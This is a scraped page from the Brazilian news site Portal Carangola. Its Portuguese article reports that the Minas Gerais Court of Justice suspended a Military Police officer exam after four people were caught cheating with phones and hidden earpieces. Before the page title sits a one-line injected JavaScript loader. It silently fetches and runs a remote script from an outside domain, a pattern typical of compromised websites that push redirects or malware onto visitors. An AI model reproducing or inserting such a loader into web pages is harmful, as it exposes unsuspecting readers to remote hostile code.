;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tribunal de Justiça suspende concurso da PM em Minas - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tribunal de Justiça suspende concurso da PM em Minas

O Tribunal de Justiça de Minas Gerais concedeu tutela antecipada suspendendo o concurso público para oficiais da Polícia Militar. O pedido foi feito pelo Ministério Público Estadual (MPE), que entrou com Ação Civil Pública contra o governo estadual visando a anulação do concurso.

Segundo apuração da Promotoria de Justiça de Uberlândia, no Triângulo Mineiro, quatro pessoas foram flagradas tentando fraudar a prova objetiva do concurso, em 17 de agosto. Um fiscal de prova flagrou um dos candidatos com um telefone celular, fios escondidos na blusa e escuta no ouvido. Outros dois homens foram encontrados dentro de um carro com escutas presas no corpo com fita adesiva.

Os três foram ouvidos no local e indicaram uma quarta pessoa, que seria o mentor da fraude. Nos celulares dos suspeitos haviam mensagens de texto com seqüências numéricas, que correspondem as  40 questões da prova.

No entendimento dos promotores, o fato aponta que houve falha no sigilo do concurso e outros candidatos podem ter fraudado a prova objetiva. “Há grande e concreta probabilidade de que o candidato que as transmitiu as tenha repassado também a outras pessoas, já que teve aproximadamente duas horas entre o horário de sua saída da sala, 10h, e o horário do término da prova, 12h”.

O concurso oferece 54 vagas para homens e seis para mulheres no Curso de Formação de Oficiais (CFO) de 2009. A prova objetiva foi aplicada em 14 cidades em em 17 de agosto. Nesta sexta-feira seria o teste de capacitação física. E a avaliação psicológica deveria acontecer ainda este ano.

Com informações do MPE

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.